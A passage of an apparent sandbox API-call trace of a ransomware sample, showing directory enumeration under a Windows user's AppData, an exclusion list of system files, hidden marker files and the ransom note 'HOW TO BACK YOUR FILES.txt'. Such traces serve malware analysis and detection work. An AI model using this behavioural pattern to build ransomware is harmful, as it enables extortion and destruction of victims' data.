dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.347] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.349] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.350] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.350] CloseHandle (hObject=0x2cc) returned 1 [0064.350] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC") returned 83 [0064.350] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.350] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1c62fb4a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x38070899, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xefacdd49, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0064.350] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.350] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.350] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.351] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.351] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1c62fb4a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x38070899, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xefacdd49, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.351] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.351] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.351] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.351] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.351] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.351] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefacdd49, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefacdd49, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefacdd49, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.351] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.351] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.351] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1c655d83, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e7f89, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1c655d83, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0064.358] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.358] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.359] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0064.360] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0064.360] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0064.360] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0064.360] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0064.360] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0064.360] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0064.360] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0064.360] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0064.360] lstrcpyW (in: lpString1=0x130ebe0, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0064.360] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0064.360] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221e0 [0064.361] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbc) returned 0xefb28 [0064.361] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221e8 | out: ListHead=0xf68b0, ListEntry=0x1221e8) returned 0x11d028 [0064.361] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1c655d83, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e892a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1c655d83, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0064.361] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.361] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.361] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0064.361] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0064.361] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0064.361] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0064.361] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0064.361] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0064.361] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0064.361] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0064.361] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0064.361] lstrcpyW (in: lpString1=0x130ebe0, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0064.361] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0064.361] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0064.361] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc0) returned 0x11e158 [0064.361] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x1221e8 [0064.361] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1c655d83, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e8f8e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1c655d83, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0064.361] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.361] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.361] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0064.361] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0064.361] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0064.361] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0064.362] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0064.362] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0064.362] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0064.362] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0064.362] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0064.362] lstrcpyW (in: lpString1=0x130ebe0, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0064.362] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0064.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222a0 [0064.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc0) returned 0x11e220 [0064.362] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222a8 | out: ListHead=0xf68b0, ListEntry=0x1222a8) returned 0x122008 [0064.362] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c655d83, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e9663, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1c655d83, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0064.362] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.362] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.362] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0064.362] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0064.362] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0064.362] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0064.362] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0064.362] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0064.362] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0064.362] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0064.362] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0064.362] lstrcpyW (in: lpString1=0x130ebe0, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0064.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0064.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb2) returned 0x123080 [0064.362] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x1222a8 [0064.362] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c655d83, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e9663, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1c655d83, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0064.363] FindClose (in: hFindFile=0x1026d0 | out: hFindFile=0x1026d0) returned 1 [0064.363] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.363] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.363] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.363] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.364] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.364] CloseHandle (hObject=0x2a0) returned 1 [0064.364] CloseHandle (hObject=0x2cc) returned 1 [0064.364] GetCurrentThreadId () returned 0xd98 [0064.364] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0064.364] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp" [0064.364] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x123080 | out: hHeap=0xe0000) returned 1 [0064.364] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0064.364] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp" [0064.364] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp\\" [0064.364] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0064.364] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.368] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.371] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.371] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.372] CloseHandle (hObject=0x2cc) returned 1 [0064.372] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp") returned 88 [0064.372] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.372] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c655d83, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e9663, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefaf218b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0064.372] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.372] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.372] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.372] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.372] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c655d83, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e9663, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefaf218b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.373] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.373] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.373] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.373] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.373] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.373] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefaf218b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefaf218b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefb1836d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.373] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.373] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.373] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xefaf218b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xefaf218b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xefb1836d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.373] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0064.373] lstrcpyW (in: lpString1=0x130ebea, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.373] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.374] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.374] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.374] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.374] CloseHandle (hObject=0x2a0) returned 1 [0064.374] CloseHandle (hObject=0x2cc) returned 1 [0064.374] GetCurrentThreadId () returned 0xd98 [0064.374] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222a8 [0064.374] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory" [0064.375] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e220 | out: hHeap=0xe0000) returned 1 [0064.375] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222a0 | out: hHeap=0xe0000) returned 1 [0064.375] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory" [0064.375] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory\\" [0064.375] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0064.375] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscalculator_8wekyb3d8bbwe\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.376] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.378] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.379] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.379] CloseHandle (hObject=0x2cc) returned 1 [0064.379] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory") returned 95 [0064.380] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.380] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1c655d83, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e8f8e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xefb1836d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0064.380] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.380] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.380] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.380] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.380] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x1c655d83, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd16e8f8e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, 